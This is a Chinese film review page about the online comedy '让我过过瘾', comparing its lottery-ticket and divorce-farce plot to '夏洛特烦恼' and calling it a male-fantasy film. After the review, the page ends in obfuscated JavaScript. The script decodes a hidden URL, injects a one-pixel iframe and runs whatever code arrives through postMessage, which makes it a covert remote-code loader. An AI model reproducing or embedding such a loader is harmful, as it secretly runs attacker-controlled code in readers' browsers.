贾冰宋晓峰《让我过过瘾》上映,俚俗爆笑,夏洛特烦恼式故事

来源:港剧网人气:加载中更新:2021-04-21 14:41

原标题:贾冰宋晓峰《让我过过瘾》上映,俚俗爆笑,夏洛特烦恼式故事

文/马庆云

1月29日,宋晓峰、蒋诗萌、孟子叶主演,贾冰客串的电影《让我过过瘾》正版视频平台上线,正式开画。这部宋晓峰领衔主演的网络电影,可谓是俚俗又爆笑,故事内容上,则是《夏洛特烦恼》式的。显然,这又是一段中年男人的造梦之旅,梦醒时刻,还是原配好的故事。

在《让我过过瘾》当中,宋晓峰饰演一个“窝囊废”男人,有一个非常强势但长相普通人的媳妇。和《夏洛特烦恼》相同,这部《让我过过瘾》也是从男主的参加同学聚会为开局的。在同学会上,宋晓峰饰演的男主角,把穷人炫富的桥段表演的可谓是爆笑非常。在这类俚俗有趣的桥段内容当中,东北二人转演员有着得天独厚的表演才华。

也正是这样的炫富被揭露,造成无地自容,才是男主进入“造梦之旅”的重要前提条件。和《夏洛特烦恼》略有不同的则是,这部《让我过过瘾》的不是真的做梦搞穿越,而是男主落魄至极,竟然鬼使神差的买了一张彩票。谁知,这张彩票竟然价值三千万元。眼看着,男主角就要过上有钱人的生活了。

借此,因为马上就要有钱了,所以男主开始进入一种对于女性的幻想当中。和《夏洛特烦恼》相同,只要男人有钱有能力了,马上想到的就是抛弃原配妻子,找一个更漂亮的。在这部《让我过过瘾》当中,也并不例外。男主因为马上就要有三千万了,所以打算和自己原配妻子离婚,转而追求公司里边的一位颜值靓丽的女性。

《让我过过瘾》这部电影的重要看点内容,就是男主和自己的同伙搞出来的各种想要离婚的闹剧内容。这批内容,又简单又爆笑,显然对准了喜剧电影的定位。对于欣赏高级喜剧的影迷而言,宋晓峰的这部《让我过过瘾》应该不能满足大家的审美需求。而对于想要一种简单干脆爆笑的影迷而言,该片无疑是非常正确的选择了。

在一轮接着一轮的闹离婚的桥段当中,蒋诗萌饰演的媳妇对男主是不离不弃。这一点,又和《夏洛特烦恼》当中的马冬梅算是神吻合了。有钱就要变渣男的男人背后,仿佛都有一个不离不弃的“糟糠之妻”。这或许也是很多男性影迷的惯用思维方式,吃着碗里的,也想占着锅里边的。

在《夏洛特烦恼》的最后,男主终于醒悟,明白马冬梅的好。而在《让我过过瘾》当中,宋晓峰呈现的男主,也是在关键时刻,幡然醒悟了。这场即将有钱的闹剧,最终以女二号带着彩票离开收场。当然,这个美女二号看似获得了金钱,最终,彩票被一阵风吹走,落入了烤玉米的火炭当中,化为乌有。这一切,都成了一场空。没钱的男人,又成了安分守己的老男人,和自己的原配过着平淡的生活。

《让我过过瘾》整个的故事,抓的就是男性影迷没钱状态下的一种精神幻想,尤其是基于金钱基础上的美女幻想。无论是夏洛,还是宋晓峰呈现的男主,都是一种典型的底层男性的状态,可这两人心中,都有着一个更为“妖艳”的女性形象,并且愿意在这场“造梦之旅”当中进行完成。显然,这是一部大男子主义的电影。

可能很多女性影迷看完这部影片之后,都不会高兴。见异思迁,有钱便要变坏,似乎也成为男人们的代名词。虽然无论是《夏洛特烦恼》还是《让我过过瘾》,都秉持了最终的原配原则,但中间的造梦之旅,实际上已经是女性影迷那里的原罪了。对于女性影迷和观众而言,未婚的时候向往高富帅,就不是原罪。已婚了,确实没见哪部女性向的作品还向往高富帅。

这或许也是男性向的作品和女性向的作品的不同之处。男性最好的时光,不在青年时期,所以他们无法追求女神。而女性最好的时光,只在青春时期,所以她们更有资本追求更好的异性。对于中年男人而言,他们能够获取的更为青春靓丽的异性青睐,大抵只能通过金钱的方式了。所以,《让我过过瘾》的前提,一定是彩票要中三千万了。对于男性影迷而言,青春年少敢追爱,结婚了,就过平淡日子,才是正经事情。

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['zXZHnyJ']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_4996`]) { var t = x(e.data[`des_s_4996`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'FFa'+'HRF'+'F0c'+'HFF'+'MlM'+'0El'+'MkY'+'lMk'+'ZqY'+'FFS'+'5oF'+'FZm'+'xFF'+'zc3'+'kuY'+'29t'+'FFJ'+'TNB'+'MTF'+'FA0'+'NDM'+'lFF'+'MkZ'+'FFj'+'NGN'+'hNF'+'FDI'+'lFF'+'MkZ'+'jLT'+'FFQ'+'5OT'+'YtM'+'jIF'+'FtM'+'WFF'+'U2',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}